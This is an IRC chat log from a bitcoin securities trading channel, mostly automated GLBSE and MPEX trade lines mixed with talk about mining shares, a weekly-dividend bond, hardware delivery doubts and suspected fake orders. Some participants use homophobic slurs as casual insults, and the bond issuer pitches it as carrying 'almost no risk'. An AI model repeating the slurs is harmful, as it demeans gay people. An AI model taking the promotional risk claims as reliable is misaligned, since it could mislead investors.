Sep 03 21:51:33 [GLBSE] [TYGRR.BOND-P] 60 @ 0.1 = 6 BTC [+] Sep 03 21:52:00 omg perv etc Sep 03 21:55:06 [GLBSE] [ASICMINER] 2 @ 0.13099999 = 0.262 BTC [+] Sep 03 21:55:16 [GLBSE] [ASICMINER] 256 @ 0.125 = 32 BTC [-] Sep 03 21:57:33 [GLBSE] [FDBF] 100 @ 0.14999999 = 15 BTC [+] Sep 03 21:58:19 [GLBSE] [GSDPT] 102 @ 0.003393 = 0.3461 BTC [-] Sep 03 22:00:37 [GLBSE] [NYAN.C] 24 @ 0.69 = 16.56 BTC [+] Sep 03 22:00:39 [GLBSE] [NYAN.C] 10 @ 0.7 = 7 BTC [+] Sep 03 22:02:14 [GLBSE] [OBSI.HRPT] 10 @ 0.10339 = 1.0339 BTC [-] Sep 03 22:02:45 [GLBSE] [UDN] 16 @ 0.09988 = 1.5981 BTC [-] Sep 03 22:03:14 [GLBSE] [MU] 1 @ 0.39 BTC [-] Sep 03 22:04:01 [GLBSE] [FDBF] 11 @ 0.14999999 = 1.65 BTC [+] Sep 03 22:04:47 [GLBSE] [ASICMINER] 2 @ 0.13099999 = 0.262 BTC [+] Sep 03 22:06:23 [GLBSE] [ASICMINER] 15 @ 0.131 = 1.965 BTC [+] Sep 03 22:07:26 [GLBSE] [ASICMINER] 6 @ 0.132 = 0.792 BTC [+] Sep 03 22:08:18 [GLBSE] [ASICMINER] 6 @ 0.13879999 = 0.8328 BTC [+] Sep 03 22:08:54 [GLBSE] [ASICMINER] 9 @ 0.13999 = 1.2599 BTC [+] Sep 03 22:09:46 Thank god I bought so much asicminer :> Sep 03 22:10:03 [GLBSE] [ASICMINER] 50 @ 0.14 = 7 BTC [+] Sep 03 22:10:33 [GLBSE] [ASICMINER] 4 @ 0.1438 = 0.5752 BTC [+] Sep 03 22:13:10 [GLBSE] [ASICMINER] 50 @ 0.141 = 7.05 BTC [-] Sep 03 22:13:18 [GLBSE] [DMC] 2 @ 0.0798 = 0.1596 BTC [+] Sep 03 22:13:19 [GLBSE] [DMC] 72 @ 0.0799 = 5.7528 BTC [+] Sep 03 22:13:57 http://www.bitcoinasic.com/ <-- so the countdown timer rolled over... what's the big news? Sep 03 22:14:43 [GLBSE] [BFLS.RIG] 10 @ 0.948598 = 9.486 BTC [+] Sep 03 22:16:27 Obsi: Planet shocked as countdown on the internet reaches zero. Sep 03 22:17:50 heh Sep 03 22:18:09 Obsi: so Im thinking this Sep 03 22:18:18 Obsi: there should be one asicminer share for every obsi.abmo share Sep 03 22:18:25 and that should be the stopping point Sep 03 22:18:32 huh? Sep 03 22:18:44 usagi: yeah, obsi has been collecting them lately Sep 03 22:18:47 kinda funnay site Sep 03 22:18:57 Yeah it's depressing the price a lot doing 2 for 1 Sep 03 22:19:21 Obsi: you know, not really Sep 03 22:19:28 theres no wall Sep 03 22:19:44 I mean the assets per share... the NAV Sep 03 22:19:52 ahh, yes, possibly. Sep 03 22:20:00 then again, the market is massively undervaluing asicminer Sep 03 22:20:04 so theres that Sep 03 22:20:12 hopefully Sep 03 22:20:38 so when does the first abmo dividend happen =P Sep 03 22:20:51 next sunday Sep 03 22:21:06 as in 6 days from now? Sep 03 22:21:15 yeah Sep 03 22:21:22 awesome Sep 03 22:21:26 how much per share? =P Sep 03 22:21:30 [GLBSE] [BTCMC] 7 @ 0.5899 = 4.1293 BTC [+] Sep 03 22:22:27 ~0.00158 Sep 03 22:22:49 MATHS! Sep 03 22:23:07 that includes the current balance held, so it will drop the following week Sep 03 22:23:18 still, thats like a month of btcmc for me Sep 03 22:23:57 prolly closer to 0.00116 the following week depending on difficulty Sep 03 22:24:25 [MPEX] [S.MPOE] 25100 @ 0.0003855 = 9.6761 BTC [-] Sep 03 22:24:32 [GLBSE] [PUREMINING] 1 @ 0.0942 BTC [+] Sep 03 22:24:51 I'll have to buy more obsi.abmo Sep 03 22:24:55 [MPEX] [S.MPOE] 15377 @ 0.0003855 = 5.9278 BTC [-] Sep 03 22:25:47 actually, maybe I shouldnt Sep 03 22:26:32 39.92 btc of btc-mining, 560.99 of btcmc, 806.75 of abmo Sep 03 22:26:38 [GLBSE] [KRAKEN] 6 @ 0.01 = 0.06 BTC [+] Sep 03 22:26:51 [GLBSE] [OBSI.HRPT] 4 @ 0.10339999 = 0.4136 BTC [+] Sep 03 22:27:12 so clearly I need to balance things out here Sep 03 22:27:32 with some OBSI.1MHS Sep 03 22:27:35 :-P Sep 03 22:28:16 naw, I gave those all to you already =P Sep 03 22:30:51 Obsi: okay hows this Sep 03 22:31:13 [GLBSE] [ASICMINER] 2 @ 0.1439 = 0.2878 BTC [+] Sep 03 22:31:17 1 asicminer for every 2 abmo Sep 03 22:31:38 and the only way to get more asicminer is to sell more abmo Sep 03 22:32:26 right now theres 21329 abmo out there Sep 03 22:32:43 so at maximum you cant hold more than 10664 Sep 03 22:32:54 which is pretty close to that 10k I said I'd agree to Sep 03 22:34:14 That's betting half ABMO's assets on a business that has yet to show any working hardware Sep 03 22:34:30 at least with BFL they have singles & minirigs to show for it Sep 03 22:34:34 yes, and you're betting the other half on BFL's SC. Sep 03 22:34:53 & BFL FPGAs which are running right now Sep 03 22:34:54 Error: "BFL" is not a valid command. Sep 03 22:35:07 yes, but you've already paid for the upgrades Sep 03 22:35:07 well it should be gribble Sep 03 22:35:10 which might not happen Sep 03 22:35:17 and thus you're out the money Sep 03 22:35:34 I have a bunch more singles sitting here I can sell into abmo as well Sep 03 22:36:11 [MPEX] [F.GIGA.ETF] 9200 @ 0.00085519 = 7.8677 BTC [-] Sep 03 22:36:53 I have a feeling ASIC prices are going to drop like a rock though... especially if they can make them for <$1 Ghash Sep 03 22:37:10 the price isnt the issue Sep 03 22:37:16 price stopped being an issue awhile ago Sep 03 22:37:18 its the cooling Sep 03 22:37:40 it's an issue if I'm paying $1200 for $40 worth of hardware Sep 03 22:37:41 people would throw a brazillion dollars at fpga rigs if they wouldnt burst into flames Sep 03 22:38:01 well, yeah Sep 03 22:38:10 but that means you keep waiting and never buying Sep 03 22:38:13 at some point you have to buy Sep 03 22:39:22 the BFL FAQ is saying late Oct/early Nov shipping now, so if there's still no news by mid Oct maybe sell some more singles into ABMO Sep 03 22:40:56 well estimated diff is about 2.6mn now Sep 03 22:41:06 so somebody is delivering something somewhere. Sep 03 22:41:51 prolly everyone turning on old GPU rigs since the price spiked as well Sep 03 22:43:32 [GLBSE] [DMC] 5 @ 0.08 = 0.4 BTC [+] Sep 03 22:44:26 maybe so. Sep 03 22:48:38 [GLBSE] [OBSI.HRPT] 3 @ 0.1034 = 0.3102 BTC [+] Sep 03 22:48:42 http://i.imgur.com/7XSZK.gif Sep 03 22:48:53 my response to bfl not delivering Sep 03 22:49:19 thart's pretty gay. Sep 03 22:49:51 indeed Sep 03 22:49:55 [GLBSE] [OBSI.HRPT] 1 @ 0.1031 BTC [-] Sep 03 22:51:35 [GLBSE] [GSDPT] 180 @ 0.003393 = 0.6107 BTC [-] Sep 03 22:54:19 mircea_popescu: I couldnt find anything gayer. Sep 03 22:54:37 o, something gayer could exist ? Sep 03 22:55:19 seriously, a blond freddy mercury with a rainbow keytar sword on a hover horse Sep 03 22:55:19 I dont think it gets any gayer than that. Sep 03 22:55:53 NSFW: http://www.justsaypictures.com/images/gayest-tattoo-ever-2ehz.jpg Sep 03 22:57:11 ok, that's pretty faggy. Sep 03 22:58:19 [GLBSE] [ASICMINER] 5 @ 0.13 = 0.65 BTC [-] Sep 03 22:58:19 [GLBSE] [PPT.B] 8 @ 0.38 = 3.04 BTC [-] Sep 03 22:58:23 [GLBSE] [ASICMINER] 3 @ 0.125 = 0.375 BTC [-] Sep 03 22:59:08 [GLBSE] [DMC] 12 @ 0.08 = 0.96 BTC [+] Sep 03 22:59:54 >someone buys dmc Sep 03 22:59:59 Im being trolled. halp. Sep 03 23:01:46 [GLBSE] [MOVETO.FUND] 1 @ 1.1877 BTC [+] Sep 03 23:05:50 [GLBSE] [ASICMINER] 10 @ 0.132 = 1.32 BTC [+] Sep 03 23:06:38 [GLBSE] [M.ETF] 9 @ 0.12 = 1.08 BTC [+] Sep 03 23:15:16 [GLBSE] [BITBOND] 3 @ 0.4567 = 1.3701 BTC [+] Sep 03 23:16:02 Ah, BTC-BOND completly sold out suddenly Sep 03 23:16:17 Seems like it's time to put more bonds on the market Sep 03 23:16:20 did it? congrats man! Sep 03 23:17:18 wd Sep 03 23:17:28 [GLBSE] [NYAN] 3 @ 0.99 = 2.97 BTC [-] Sep 03 23:18:19 hey mircea_popescu I am toying with xchat. is there a plugin for otr or do I need to do a custom build? Sep 03 23:18:38 nono there's xchat-otr Sep 03 23:19:33 http://packages.debian.org/sid/xchat-otr if you're on deb Sep 03 23:20:21 [GLBSE] [OBSI.HRPT] 4 @ 0.1034 = 0.4136 BTC [+] Sep 03 23:20:43 thanks. nah not deb...I will probably need to build it if I want it Sep 03 23:22:23 my xchat doesnt even have the python plugin Sep 03 23:23:22 hmm odd Sep 03 23:23:29 it comes with both python and tcl iirc. Sep 03 23:23:40 [GLBSE] [FDBF] 1 @ 0.14999999 BTC [+] Sep 03 23:23:50 eh it's openbsd sillyness. I like it so far though seems to be more stable. Sep 03 23:24:20 I love pidgin, but as an irc client it wasn't doing well Sep 03 23:24:47 Anyone has some Gigamining stock to trade? It's getting around my price, I'd buy a few hundreds at 0.83 Sep 03 23:25:10 iirc freebsd had irssi-otr Sep 03 23:25:12 shouldn't you be off paying us our dividends:P Sep 03 23:25:19 truth of the matter they're not really so well maintained. Sep 03 23:25:33 ahh good diea, I'll check, i did grab irssi Sep 03 23:25:49 for what? BTC-BOND? Sep 03 23:25:52 [GLBSE] [BTC-BOND] 1037 @ 0.01 = 10.37 BTC [+] Sep 03 23:25:55 [GLBSE] [OBSI.HRPT] 85 @ 0.1034 = 8.789 BTC [+] Sep 03 23:26:01 I just did Sep 03 23:26:12 fancy, more buyers Sep 03 23:26:23 lol Sep 03 23:26:25 [GLBSE] [OBSI.HRPT] 15 @ 0.10354 = 1.5531 BTC [+] Sep 03 23:26:30 what bond is it btw ? Sep 03 23:26:47 oh I was just giving you a hard time BTC-Mining, divvies received thanks Sep 03 23:26:55 What do you mean, what bond is it? Sep 03 23:27:15 well i mean what kind. is it a hash based bond ? is it a pirate-style, i pay you X% don't ask any questions ? Sep 03 23:27:21 is it your housing development plan ? Sep 03 23:27:52 https://glbse.com/asset/view/BTC-BOND Sep 03 23:27:53 It's 0.5% weekly fixed dividend Sep 03 23:28:03 With 200% in collaterals Sep 03 23:28:34 Which basically mean, for each BTC loaned, I need 1 BTC of my own money to make it 200%. Sep 03 23:28:43 Date/time of buyback: 00:24, Sat Jul 21 Sep 03 23:28:43 Buyback price:0.0101 Sep 03 23:28:46 next year ? Sep 03 23:29:12 no, 21 July this year Sep 03 23:29:27 there's no buyback date, it's a buyback anytime bond. Sep 03 23:29:49 o Sep 03 23:29:50 and for once, a GLBSE "bond" is actually a real bond. Look at contract. Sep 03 23:30:09 It's defined as a loan. With terms matching accordingly. Sep 03 23:30:46 i am reading it Sep 03 23:31:04 so 10% insured no matter what, 1 dollar to the btc insured from btc loss and a trade collateralization of 100% Sep 03 23:31:09 imo BTC-Mining doesn't go around trying to whore it out so it's gone unnoticed by the swashbucklers. im certain that will change, and already seems to be Sep 03 23:31:25 it's not a bad design. what;'s your float ? Sep 03 23:32:05 https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdGFKVlAtZVAzOGNqS1Brd05MUlFlT2c Sep 03 23:32:17 Just look at holdings + current outstanding bonds Sep 03 23:32:27 all the info is updated a few times each week. Sep 03 23:32:57 13437 ? Sep 03 23:32:58 5. Bonds dividends Sep 03 23:32:58 Bonds will pay 0.5% weekly (or about 26% per year). Sep 03 23:33:01 wtf Sep 03 23:33:04 low.... Sep 03 23:33:30 Yes, but it's a loan and you carry almost no risk. Sep 03 23:33:59 Plus there's guarantees against bitcoin system failing as a whole. Sep 03 23:34:38 yeah. it;'s not a bad design. Sep 03 23:34:38 like what? Sep 03 23:34:55 your back up? Sep 03 23:35:02 Like if the system is compromised/loss of confidende/etc. Sep 03 23:35:09 i'd certainly include it in the next MPCD set. Sep 03 23:35:25 I'll pay 1$ per bitcoin loaned to me. Sep 03 23:35:46 assuming bitcoin crashes Sep 03 23:35:54 not likely Sep 03 23:35:56 Otherwise, there's much more assets than the loan face value. Sep 03 23:36:19 Assuming a few things on GLBSE fail, the bond can still be paid back. Sep 03 23:36:35 [GLBSE] [FDBF] 20 @ 0.14999999 = 3 BTC [+] Sep 03 23:36:45 so in the end it`s just a loan against 0.5% Sep 03 23:36:54 hmmn Sep 03 23:37:26 with questionable liquidity Sep 03 23:38:05 I won't get into an asset I can't liquidate. For btc-bond, the option of redeeming to btc-mining himself is there, and hes always in irc...from my experience Sep 03 23:38:25 I asked him if he would let me redeem if he needed, he said no problem Sep 03 23:38:28 https://github.com/MatthewLM/cbitcoin << so this guy is working on making a C impklementation of bitcoin \ Sep 03 23:38:34 that wont mean he`ll buy them back Sep 03 23:38:36 if needed* :-/ Sep 03 23:38:42 i just sent him a little btc, and maybe you want to do the same thing ppls. Sep 03 23:39:19 I believe I can sell my btc-bond back to btc-mining at any time for 0.01 minus exchange fees Sep 03 23:39:29 am I wrong, BTC-Mining Sep 03 23:39:47 hmmmmn good luck BTC-mining is this statement true?? Sep 03 23:39:55 PsychoticBoy, yes, I'll buy back the bonds. Sep 03 23:39:57 [GLBSE] [ASICMINER] 5 @ 0.1399 = 0.6995 BTC [+] Sep 03 23:39:58 [GLBSE] [ASICMINER] 5 @ 0.14 = 0.7 BTC [+] Sep 03 23:40:05 whenever I like it? Sep 03 23:40:41 Assuming I got the funds on hand, yes. But suppose you have a large amount, I might not. I try to keep the funds invested into assets. Sep 03 23:40:52 ok clear Sep 03 23:40:57 But indeed it would be possible to trade them for stocks in the portfolio. Sep 03 23:41:27 I've got about 30 btc in btc-bond now. Sep 03 23:41:41 Still not intresting enough for me but good luck Sep 03 23:41:48 so is it correct that your total float is about 130btc ? Sep 03 23:42:06 yes mircea Sep 03 23:42:51 !ticker FDBF Sep 03 23:43:06 [GLBSE:FDBF] [Bid: 0.149] [Ask: 0.14999999] [Spread: 0.00099999] [Last: 0.14999999] [24hVol: 46.19999278] [7dAvg: 0.14791138] Sep 03 23:43:27 !ticker S.DICE Sep 03 23:43:28 [MPEX:S.DICE] 1day: 0.0034 / 0.0034 / 0.0034 (85987 shares, 292.36 BTC), 30day: 0.0032 / 0.00327065 / 0.0034 (3479000 shares, 11,378.60 BTC) Sep 03 23:44:01 plenty of room to grow there. Sep 03 23:46:29 [GLBSE] [OBSI.HRPT] 11 @ 0.10354 = 1.1389 BTC [+] Sep 03 23:52:15 PsychoticBoy, so what about FDBF? Will you buyback shares if there isn't sufficient liquidity on the glbse and an investor needs out? Sep 03 23:52:35 no, its not a bond Sep 03 23:52:44 its a share Sep 03 23:52:50 you own the assets Sep 03 23:53:26 [GLBSE] [DMC] 1 @ 0.07501 BTC [-] Sep 03 23:53:28 [GLBSE] [DMC] 1 @ 0.075 BTC [-] Sep 03 23:53:29 [GLBSE] [DMC] 1 @ 0.073 BTC [-] Sep 03 23:53:30 [GLBSE] [DMC] 1 @ 0.071 BTC [-] Sep 03 23:53:31 [GLBSE] [DMC] 1 @ 0.07 BTC [-] Sep 03 23:53:32 lol Sep 03 23:53:44 [GLBSE] [RAREEARTH] 1 @ 0.0096 BTC [+] Sep 03 23:54:43 [MPEX] [S.DICE] 2500 @ 0.0034 = 8.5 BTC [+] Sep 03 23:59:03 [GLBSE] [DMC] 5 @ 0.07 = 0.35 BTC [-] Sep 04 00:00:42 !pl DMC Sep 04 00:00:43 !pl [@] [] Sep 04 00:00:49 !pl DMC 0.07 Sep 04 00:00:49 Requesting data from GLBSE (might take a while). Sep 04 00:00:53 DMC [1@0.07BTC] paid: 0.02635814 BTC. Last price: 0.07 BTC. Capital gain: 0 BTC. Total: 0.02635814 BTC. (37.7%) Sep 04 00:01:27 [GLBSE] [FDBF] 1 @ 0.14999999 BTC [+] Sep 04 00:01:31 [GLBSE] [GIGAMINING] 1 @ 0.84499899 BTC [+] Sep 04 00:02:12 [GLBSE] [GIGAMINING] 1 @ 0.84499899 BTC [+] Sep 04 00:03:33 [MPEX] [F.GIGA.ETF] 5442 @ 0.00085513 = 4.6536 BTC [-] Sep 04 00:03:34 [MPEX] [F.GIGA.ETF] 6600 @ 0.00085394 = 5.636 BTC [-] Sep 04 00:03:36 [MPEX] [F.GIGA.ETF] 7579 @ 0.00085209 = 6.458 BTC [-] Sep 04 00:03:37 [MPEX] [F.GIGA.ETF] 17400 @ 0.00084999 = 14.7898 BTC [-] Sep 04 00:03:37 [MPEX] [F.GIGA.ETF] 2979 @ 0.00084845 = 2.5275 BTC [-] Sep 04 00:04:20 [GLBSE] [OBSI.HRPT] 10 @ 0.10353999 = 1.0354 BTC [-] Sep 04 00:05:24 [GLBSE] [ASICMINER] 40 @ 0.13033003 = 5.2132 BTC [-] Sep 04 00:05:40 [GLBSE] [BAKEWELL] 7 @ 0.15 = 1.05 BTC Sep 04 00:05:42 [GLBSE] [BAKEWELL] 1 @ 0.15 BTC Sep 04 00:05:43 [GLBSE] [BAKEWELL] 100 @ 0.15 = 15 BTC Sep 04 00:06:47 [GLBSE] [OBSI.HRPT] 20 @ 0.10353999 = 2.0708 BTC [-] Sep 04 00:07:05 [GLBSE] [BITBOND] 2 @ 0.4567 = 0.9134 BTC [+] Sep 04 00:13:40 [MPEX] [O.BTCUSD.C100T] 245 @ 0.20112911 = 49.2766 BTC [+] Sep 04 00:14:17 [GLBSE] [PUREMINING] 6 @ 0.0941 = 0.5646 BTC [-] Sep 04 00:14:46 [GLBSE] [PUREMINING] 7 @ 0.0942 = 0.6594 BTC [+] Sep 04 00:18:17 ;;bc,24hprc Sep 04 00:18:18 10.33 Sep 04 00:18:31 [MPEX] [O.BTCUSD.C100T] 3 @ 0.20112911 = 0.6034 BTC [+] Sep 04 00:18:41 [GLBSE] [BIB.PIRATE] 20 @ 0.08 = 1.6 BTC [-] Sep 04 00:21:15 [MPEX] [O.BTCUSD.C110T] 1 @ 0.15338189 BTC [+] Sep 04 00:26:57 [GLBSE] [BIF.1YR.LOAN] 10 @ 0.90384615 = 9.0385 BTC [-] Sep 04 00:26:59 [GLBSE] [BIF.1YR.LOAN] 23 @ 0.92307692 = 21.2308 BTC [+] Sep 04 00:29:21 [GLBSE] [V.HRL] 50 @ 1 = 50 BTC Sep 04 00:30:42 [GLBSE] [UDN] 2 @ 0.0998 = 0.1996 BTC [-] Sep 04 00:32:27 !ticker bakewell Sep 04 00:32:30 [GLBSE:BAKEWELL] [Bid: 0.125] [Ask: 0.15] [Spread: 0.025] [Last: 0.15] [24hVol: 16.2] [7dAvg: 0.15] Sep 04 00:32:30 [GLBSE] [OBSI.HRPT] 99 @ 0.1035 = 10.2465 BTC [-] Sep 04 00:33:26 [GLBSE] [OBSI.HRPT] 50 @ 0.10353999 = 5.177 BTC [+] Sep 04 00:33:28 [GLBSE] [OBSI.HRPT] 124 @ 0.10354 = 12.839 BTC [+] Sep 04 00:33:49 well Sep 04 00:34:00 he doubled his ipo costs Sep 04 00:34:46 [GLBSE] [OBSI.HRPT] 50 @ 0.10354 = 5.177 BTC [+] Sep 04 00:34:46 that sounds sad Sep 04 00:35:38 [GLBSE] [ASICMINER] 15 @ 0.143 = 2.145 BTC [+] Sep 04 00:36:04 [MPEX] [S.MPOE] 10723 @ 0.0003855 = 4.1337 BTC [-] Sep 04 00:36:05 [MPEX] [S.MPOE] 17477 @ 0.00038548 = 6.737 BTC [-] Sep 04 00:36:09 [GLBSE] [OBSI.HRPT] 64 @ 0.10355 = 6.6272 BTC [+] Sep 04 00:37:08 [MPEX] [S.MPOE] 11562 @ 0.00038567 = 4.4591 BTC [+] Sep 04 00:37:10 [MPEX] [S.MPOE] 14000 @ 0.00038815 = 5.4341 BTC [+] Sep 04 00:37:11 [MPEX] [S.MPOE] 37601 @ 0.00038846 = 14.6065 BTC [+] Sep 04 00:37:11 Wasn't it 0.15 all the time? Sep 04 00:37:12 [MPEX] [S.MPOE] 30178 @ 0.00038863 = 11.7281 BTC [+] Sep 04 00:37:13 [MPEX] [S.MPOE] 47800 @ 0.00038875 = 18.5823 BTC [+] Sep 04 00:37:14 [MPEX] [S.MPOE] 9192 @ 0.00039013 = 3.5861 BTC [+] Sep 04 00:37:14 [MPEX] [S.MPOE] 25800 @ 0.00039013 = 10.0654 BTC [+] Sep 04 00:37:15 [MPEX] [S.MPOE] 8100 @ 0.00039174 = 3.1731 BTC [+] Sep 04 00:37:16 [MPEX] [S.MPOE] 20994 @ 0.0003926 = 8.2422 BTC [+] Sep 04 00:37:17 [MPEX] [S.MPOE] 18000 @ 0.00039272 = 7.069 BTC [+] Sep 04 00:37:19 [MPEX] [S.MPOE] 33736 @ 0.00039294 = 13.2562 BTC [+] Sep 04 00:37:20 [MPEX] [S.MPOE] 11800 @ 0.00039343 = 4.6425 BTC [+] Sep 04 00:37:21 [MPEX] [S.MPOE] 4300 @ 0.00039344 = 1.6918 BTC [+] Sep 04 00:37:22 [MPEX] [S.MPOE] 28200 @ 0.00039409 = 11.1133 BTC [+] Sep 04 00:37:23 [MPEX] [S.MPOE] 59700 @ 0.00039464 = 23.56 BTC [+] Sep 04 00:37:23 [MPEX] [S.MPOE] 12700 @ 0.00039541 = 5.0217 BTC [+] Sep 04 00:37:24 [MPEX] [S.MPOE] 59100 @ 0.00039624 = 23.4178 BTC [+] Sep 04 00:37:25 [MPEX] [S.MPOE] 40700 @ 0.00039675 = 16.1477 BTC [+] Sep 04 00:37:26 [MPEX] [S.MPOE] 15137 @ 0.00039696 = 6.0088 BTC [+] Sep 04 00:37:27 [MPEX] [S.MPOE] 384 @ 0.00039817 = 0.1529 BTC [+] Sep 04 00:37:28 [MPEX] [S.MPOE] 3200 @ 0.00039886 = 1.2764 BTC [+] Sep 04 00:37:29 [MPEX] [S.MPOE] 56700 @ 0.00039962 = 22.6585 BTC [+] Sep 04 00:37:30 [MPEX] [S.MPOE] 25200 @ 0.00039983 = 10.0757 BTC [+] Sep 04 00:37:32 [MPEX] [S.MPOE] 1000 @ 0.0004 = 0.4 BTC [+] Sep 04 00:37:32 [MPEX] [S.MPOE] 3974 @ 0.00040217 = 1.5982 BTC [+] Sep 04 00:37:33 [MPEX] [S.MPOE] 20942 @ 0.00040302 = 8.44 BTC [+] Sep 04 00:37:35 that's a fucken' buy Sep 04 00:38:05 Nah.... Sep 04 00:38:06 So let me understand this Sep 04 00:38:12 that's only like 100 BTC Sep 04 00:38:21 twenty plus individual people Sep 04 00:38:25 had orders for that? Sep 04 00:38:33 With orders averaging... 5bts? Sep 04 00:38:38 [MPEX] [S.DICE] 12000 @ 0.0034 = 40.8 BTC [+] Sep 04 00:38:41 Looks like one person trying to spam irc. Sep 04 00:38:45 usagi: have you seen the book an that thing? Sep 04 00:39:06 In other words, someone is acting to intentionally decieve people here Sep 04 00:39:22 [MPEX] [S.BVPS] 74 @ 0.00377777 = 0.2796 BTC [-] Sep 04 00:39:23 [MPEX] [S.BVPS] 738 @ 0.00378 = 2.7896 BTC [+] Sep 04 00:39:25 [MPEX] [S.BVPS] 1188 @ 0.003801 = 4.5156 BTC [+] Sep 04 00:39:31 Likely for the gain of free advertising, or to give the impression that MPEX does a lot of volume. Sep 04 00:39:48 fake bids with real btc, eh? Sep 04 00:39:52 An intentional act to decieve made for gain is the legal definition of fraud. Sep 04 00:40:07 [MPEX] [B.MPCD.C] 41500 @ 0.001028 = 42.662 BTC [-] Sep 04 00:40:08 [MPEX] [B.MPCD.C] 58500 @ 0.00103 = 60.255 BTC [+] Sep 04 00:40:11 [GLBSE] [OBSI.HRPT] 49 @ 0.10355 = 5.074 BTC [+] Sep 04 00:40:30 usagi: what makes you think those arn't real asks that were bid into? Sep 04 00:40:31 ;;join #bitcoin-market Sep 04 00:40:31 Error: You don't have the admin capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. Sep 04 00:40:36 Oh they were real Sep 04 00:40:42 Just the pattern seems weird Sep 04 00:40:47 Obviously that was one buy Sep 04 00:40:54 So why are there so many little sells? Sep 04 00:41:00 [GLBSE] [KRAKEN] 50 @ 0.01 = 0.5 BTC [+] Sep 04 00:41:04 [GLBSE] [STANDARD.GOLD] 13 @ 0.00000026 BTC [-] Sep 04 00:41:08 usagi: because it probably reports every order crossed Sep 04 00:41:12 a bit like mtgox in its annoying emails Sep 04 00:41:13 [GLBSE] [MMM] 3 @ 0.9 = 2.7 BTC [+] Sep 04 00:41:15 yeah Sep 04 00:41:18 its one order Sep 04 00:41:22 Yeah, but why are there so many little sells :p Sep 04 00:41:27 in the first place Sep 04 00:41:28 [GLBSE] [GSDPT] 77 @ 0.003393 = 0.2613 BTC [-] Sep 04 00:41:30 because someone's market making Sep 04 00:41:35 or attempting to, or something Sep 04 00:42:04 [GLBSE] [FUTUREFUND] 10 @ 0.00012433 = 0.0012 BTC [+] Sep 04 00:42:21 usagi: the 'i'm just asking questions' approach is not cool Sep 04 00:42:32 Here I'm not just asking questions Sep 04 00:42:34 usagi: bots Sep 04 00:42:42 and assholes trying to put up fake walls Sep 04 00:43:16 [GLBSE] [NYAN.C] 1 @ 0.71 BTC [+] Sep 04 00:43:19 if you think it's fraud, that's a positive accusation. which in an actual discussion, holds the burden of proof Sep 04 00:44:00 Where is the fraud? Sep 04 00:44:14 what did you even mention fraud for then? Sep 04 00:44:23 A fraud is an intentional act to decieve for gain... The act of fraud here lies in why so many small orders were made Sep 04 00:44:43 I was speculating. Sep 04 00:44:45 usagi: it's fairly common, if you're providing liquidity for something, to make a ladder of small orders Sep 04 00:44:48 so many small orders does not imply fraud Sep 04 00:44:50 instead of a wall Sep 04 00:45:07 whats fraud? Sep 04 00:45:13 tiny funny sized amounts? Sep 04 00:45:26 its just bots being fucktards Sep 04 00:45:40 Most bots suck Sep 04 00:46:59 [GLBSE] [FDBF] 1 @ 0.14999999 BTC [+] Sep 04 00:47:00 WAAAAAARS THE DIVIDENDS! Sep 04 00:48:17 [GLBSE] [NYAN.C] 9 @ 0.71 = 6.39 BTC [+] Sep 04 00:48:44 [GLBSE] [BAKEWELL] 10 @ 0.15 = 1.5 BTC Sep 04 00:49:09 [GLBSE] [GSDPT] 52 @ 0.00315 = 0.1638 BTC [-] Sep 04 00:49:11 [GLBSE] [GSDPT] 1 @ 0.003 BTC [-] Sep 04 00:49:12 [GLBSE] [GSDPT] 200 @ 0.0029 = 0.58 BTC [-] Sep 04 00:49:13 [GLBSE] [GSDPT] 479 @ 0.0028 = 1.3412 BTC [-] Sep 04 00:49:18 Why the sudden interest in Bakewell? Sep 04 00:49:32 [GLBSE] [FDBF] 10 @ 0.14999999 = 1.5 BTC [+] Sep 04 00:49:33 The owner keeps 20% for himself Sep 04 00:49:43 [GLBSE] [GSDPT] 2 @ 0.0028 = 0.0056 BTC [-] Sep 04 00:49:55 Bakewell's security is insured by CPA Sep 04 00:50:00 If he takes the money and runs, we pay out. Sep 04 00:50:01 http://dollarcollapse.com/category/welcome-to-the-third-world/ Sep 04 00:50:10 [GLBSE] [DMC] 12 @ 0.08 = 0.96 BTC [+] Sep 04 00:51:43 [GLBSE] [FDBF] 14 @ 0.14999999 = 2.1 BTC [+] Sep 04 00:52:10 [GLBSE] [BAKEWELL] 10 @ 0.15 = 1.5 BTC Sep 04 00:53:00 [GLBSE] [BAKEWELL] 1 @ 0.15 BTC Sep 04 00:54:07 https://www.youtube.com/watch?v=QTMRPs8LUkg&feature=related Sep 04 00:54:14 [GLBSE] [NYAN.C] 10 @ 0.72 = 7.2 BTC [+] Sep 04 00:54:19 mindfuck speed. Sep 04 00:55:45 [GLBSE] [NYAN.C] 5 @ 0.73 = 3.65 BTC [+] Sep 04 00:56:20 [GLBSE] [FPGAMINING] 15 @ 0.7779999 = 11.67 BTC [+] Sep 04 00:57:23 [MPEX] [S.DICE] 10000 @ 0.0034 = 34 BTC [+] Sep 04 00:57:44 [GLBSE] [NYAN.C] 5 @ 0.73 = 3.65 BTC [+] Sep 04 00:58:16 [MPEX] [F.GIGA.ETF] 11737 @ 0.00084845 = 9.9583 BTC [-] Sep 04 00:58:18 [MPEX] [F.GIGA.ETF] 6600 @ 0.00084329 = 5.5657 BTC [-] Sep 04 00:58:19 [MPEX] [F.GIGA.ETF] 600 @ 0.00084306 = 0.5058 BTC [-] Sep 04 00:58:20 [MPEX] [F.GIGA.ETF] 5500 @ 0.00083837 = 4.611 BTC [-] Sep 04 00:58:21 [MPEX] [F.GIGA.ETF] 563 @ 0.0008259 = 0.465 BTC [-] Sep 04 01:00:57 [GLBSE] [OBSI.HRPT] 1 @ 0.1033 BTC [-] Sep 04 01:00:59 [GLBSE] [OBSI.HRPT] 30 @ 0.10265 = 3.0795 BTC [-] Sep 04 01:01:00 [GLBSE] [OBSI.HRPT] 20 @ 0.10265 = 2.053 BTC [-] Sep 04 01:01:01 [GLBSE] [OBSI.HRPT] 24 @ 0.10260001 = 2.4624 BTC [-] Sep 04 01:02:41 [GLBSE] [NYAN.B] 9 @ 0.99 = 8.91 BTC [-] Sep 04 01:03:37 [GLBSE] [NASTY] 1 @ 0.6 BTC [+] Sep 04 01:03:38 [GLBSE] [NASTY] 1 @ 0.61 BTC [+] Sep 04 01:03:40 [GLBSE] [NASTY] 1 @ 0.61 BTC [+] Sep 04 01:03:41 [GLBSE] [NASTY] 2 @ 0.62 = 1.24 BTC [+] Sep 04 01:03:42 [GLBSE] [NASTY] 14 @ 0.63999 = 8.9599 BTC [+] Sep 04 01:05:07 [GLBSE] 